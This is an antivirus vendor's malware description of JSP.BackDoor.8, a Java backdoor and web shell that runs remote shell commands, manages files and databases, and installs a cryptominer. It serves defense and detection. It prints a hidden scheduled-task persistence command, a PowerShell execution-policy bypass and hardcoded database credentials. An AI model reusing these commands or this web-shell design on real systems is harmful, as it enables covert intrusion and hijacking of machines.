Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

JSP.BackDoor.8

Added to the Dr.Web virus database: 2023-09-08

Virus description added:

SHA1: 0c6249feee3fef50fc0a5a06299c3e81681cc838

SHA1: 41d2247842151825aa8001a35ee339a0fef2813f

SHA1: 62ea0fce2716006d16a1408cda159cf20f90004e

SHA1: 33c11e7b2b3950a430cf3b40128429d9b723103c

Description

JSP.BackDoor.8 is a trojan backdoor program capable of infecting Windows and Linux devices and executing shell commands sent from a remote host. The trojan is implemented as a JAR file, and it is controlled by HTTP requests.

Operating routine

sha1:41d2247842151825aa8001a35ee339a0fef2813f

During initialization, this sample checks its environment variables, and then receives a GET request containing a “t” parameter with the value “cmd” and a “c” parameter that passes along the command to execute. If the trojan is run on Windows, it executes

cmd /c <value>

otherwise, it executes

/bin/bash -c <value>

When the trojan receives a POST request, it loads additional functionality: the request body contains a base64 encoded plugin that is loaded into the process memory.

sha1:0c6249feee3fef50fc0a5a06299c3e81681cc838

This JAR file is also remotely controlled using HTTP requests, but it only supports the following types of requests: GET, POST, HEAD. The trojan checks the “go” parameter containing the IP address for downloading the script. It then checks the operating system. In the case of Windows, it downloads a script called 1.ps1 and executes it with the following parameters

Set-ExecutionPolicy Bypass -Scope Process -Force

If the trojan is running on Linux, it downloads the ELF file kinsing (Linux.BtcMine.546) and executes it by exporting the SKL=op environment variable.

The 1.ps1 script downloads the miner’s components, namely sysupdate.exe (the miner itself), config.json and the update.ps1 script. If the miner had been previously installed in the system, the script stops it and updates it. After downloading the files, the script creates a job for the system scheduler to run the update.ps1 script every minute, suppressing any warnings. To do this, the following command is executed:

SchTasks.exe /Create /SC MINUTE /TN “Update service for Windows Service” /TR “PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\update.ps1” /MO 30 /F 
sha1:62ea0fce2716006d16a1408cda159cf20f90004e

This sample contains two jsp servlets: updata2_jsp and chakan_jsp. The former connects to the Openfire server SQL database

jdbc:mysql[:]//localhost:3306/openfire root 123456

and takes data from the query parameters:

name0..30 = ; value0..30= ;

The servlet then updates the “name” variable in the “ofproperty” table according to the “value”.

Name Description
cmd Executes a command via cmd.exe or /bin/bash, depending on the OS
copy Creates a page for copying a file
del Deletes a file. The file name is based on path + / + file
down Displays the contents of a file on the screen. The file name is based on path + / + file
edit Creates a page for editing a file
newFile Creates a file/directory.
Contains three query parameters:
fileName — object name
btnNewFile — if this field is not empty, a file will be created
btnNewDir — if this field is not empty, a directory will be created
save Saves the data from the “content” parameter to a file. The file name is based on path + / + file
savecopy Gets the name of the file to copy from the “file2” parameter. If the name received is a directory, the new file name will be formed as follows: <dir>/"cqq_"; + <original file name>
The file is copied from “path + file” to “file2”
sha1:33c11e7b2b3950a430cf3b40128429d9b723103c

The sample processes only HTTP requests with the following methods GET, POST, and HEAD. If the request comes without the “action” parameter, then “action” will equal “main”; otherwise, the “action” parameter contains the name of the form to be interacted with. The main menu of the web shell consists of the following forms: main, filesystem, command, database, config, about, exit. They are described below:

Filesystem

The command is passed to the backdoor in the “fsAction” parameter. If this parameter is empty, it is assigned the “list” value.

List of fsAction commands

Name Description
browse Outputs a list of files in the parent directory
copyto Moves a file from the source directory to the target directory. The value of the source directory is taken from the “deleteFile” parameter; the value of the destination directory is taken from the “dstPath” parameter
createFile Creates a file; the file name is taken from the “filename” parameter
createFolder Creates a folder; the file name is taken from the “folderName” parameter
deleteFile Deletes a file; the file name is taken from the “filesDelete” parameter
list Outputs a list of files in the directory whose name is passed as an argument
open Outputs the contents of the file
rename Renames a file; the old file name is taken from the “fileRename” parameter; the new name is taken from the “newName” parameter
save Saves an open file; the file content comes in the “fileContent” parameter
saveAs Saves the file; the file content comes in the “fileContent” parameter
upload Updates the file; the file comes in the body of the request
Command

Runs the command transmitted in the “command” parameter. The result is displayed on the screen.

Database

The command is transmitted in the “dbAction” parameter. If this parameter is empty, it is assigned the value “main”, and the SQL query builder menu is displayed on the screen. When a query is sent, the “dbAction” parameter is assigned the value “dbContent”.

Method “dbConnect”. The arguments of this method are data for connecting to the database, which are taken from the query parameters: dbServer, dbPort, dbUsername, dbPassword, dbName. The query to be executed is taken from the “sql” parameter. After the command is executed, its result is displayed on the screen.

Config

The command is transmitted in the “cfAction” parameter. If this parameter is empty, it is assigned the value “main”.

List of cfAction commands

Name Description
main Displays: password, encodeType, sessionTime, fileTypes
save Stores password, encode, sessionTime, and textFileTypes. The values are taken from the corresponding parameters
About

This command outputs a blank page.

Exit

After this command is entered, the password will be removed from the session and the user is redirected to the main authorization page.

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android